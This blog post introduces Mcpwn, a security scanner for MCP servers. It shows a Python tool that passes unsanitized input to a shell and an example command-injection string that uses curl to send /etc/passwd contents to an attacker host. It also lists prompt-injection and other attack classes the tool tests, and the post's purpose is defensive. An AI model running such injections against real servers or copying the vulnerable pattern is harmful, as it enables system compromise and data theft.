Model Context Protocol (MCP) is Anthropic's new standard for connecting AI agents to external tools and data sources. As I started working with MCP servers, I realized something concerning: there's no automated security testing for them.
The Problem
MCP servers provide AI agents with strong abilities, including file operations, command execution, and database access. One vulnerable tool can mean full system compromise. Manual code reviews often overlook injection vulnerabilities in tool arguments.
Here's what I found during a security review:
# Looks safe in code review, right?
def execute_command(command: str):
return subprocess.run(command, shell=True, capture_output=True)
The vulnerability? Tool arguments weren't sanitized. An AI agent could inject:
"ls; curl http://attacker.com/exfil?data=$(cat /etc/passwd)"
Building Mcpwn
I built Mcpwn - an automated security scanner for MCP servers. The name is a play on "MCP pwn" (compromise).
Key Design Decisions
1. Semantic Detection Over Crash Detection
Instead of looking for crashes, Mcpwn analyzes response content for patterns:
-
uid=1000(user)→ Command injection -
root:x:0:0:root→ Path traversal -
-----BEGIN PRIVATE KEY→ File read vulnerability - Timing deviations → Blind injection
2. Zero Dependencies
Pure Python stdlib. No pip install needed. This was critical for:
- CI/CD integration (no dependency hell)
- Security auditing (less attack surface)
- Quick adoption (clone and run)
3. Structured Output
JSON and SARIF formats for AI analysis and CI/CD integration:
{
"summary": {
"total": 3,
"by_severity": {"CRITICAL": 2, "HIGH": 1}
},
"findings": [...]
}
Architecture
The scanner has three core components:
core/
├── pentester.py # Orchestrator (thread-safe, timeout handling)
├── detector.py # Semantic detection engine
└── reporter.py # JSON/HTML/SARIF reports
Attack Surface Coverage
Currently implemented:
- Tool argument injection (RCE, path traversal)
- Resource path traversal
- Prompt injection (context confusion, delimiter breakout)
- Protocol fuzzing (malformed JSON-RPC)
- State desync attacks
- Resource exhaustion
Detection example:
# Semantic detector checks response patterns
def detect_rce(response: str) -> bool:
patterns = [
r'uid=\d+\([^)]+\)', # Unix user ID
r'gid=\d+\([^)]+\)', # Unix group ID
r'root:x:0:0:root' # /etc/passwd
]
return any(re.search(p, response) for p in patterns)
Real-World Impact
During testing, Mcpwn found RCE vulnerabilities in production MCP servers - specifically tool argument injection patterns that manual code review missed.
Example finding:
$ python mcpwn.py --quick npx -y @modelcontextprotocol/server-filesystem /tmp
[INFO] Found 2 tools, 0 resources
[WARNING] execute_command: RCE via command
[WARNING] Detection: uid=1000(user) gid=1000(user)
[INFO] Mcpwn complete
Usage
Quick scan (5 seconds):
python mcpwn.py --quick npx -y @modelcontextprotocol/server-filesystem /tmp
Generate JSON report for AI analysis:
python mcpwn.py --output-json report.json <your-mcp-server>
CI/CD integration (SARIF format):
python mcpwn.py --output-sarif report.sarif <your-mcp-server>
AI-Assisted Security Workflow
Mcpwn is designed to work with AI assistants:
- Automated baseline scan → Mcpwn finds pattern-based vulnerabilities
- Structured output → JSON/SARIF for AI parsing
- AI deep analysis → Validates findings, finds logic flaws Mcpwn missed
This hybrid approach combines automated pattern matching with AI contextual understanding.
Lessons Learned
1. Semantic detection beats crash detection
Looking for uid=1000 in responses is more reliable than waiting for segfaults. Many vulnerabilities don't crash - they just leak data.
2. Thread safety is critical
MCP servers are concurrent. Request ID generation, health checks, and send operations all needed proper locking.
3. Timeouts everywhere
Default 10s timeout with configurable overrides. Quick mode uses 5s. Learned this after hanging on unresponsive servers.
4. False positives matter
Path traversal detection requires 2+ markers to reduce false positives. Single marker = too noisy.
What's Next
Planned features:
- SSRF injection detection
- Deserialization attack testing
- Schema pollution checks
- Auth bypass testing
Current limitations:
Mcpwn detects runtime exploits but misses:
- Configuration vulnerabilities (exposed credentials)
- Business logic flaws
- Complex multi-step attack chains
Automated tools find known patterns. Manual review finds logic flaws. Use both.
Try It
GitHub: https://github.com/Teycir/Mcpwn
Quick start:
git clone https://github.com/Teycir/Mcpwn.git
cd Mcpwn
python3 mcpwn.py --help
MIT licensed, 45 passing tests, zero dependencies.
What security testing approaches have you found effective for AI agent infrastructure? Drop a comment below.
Top comments (0)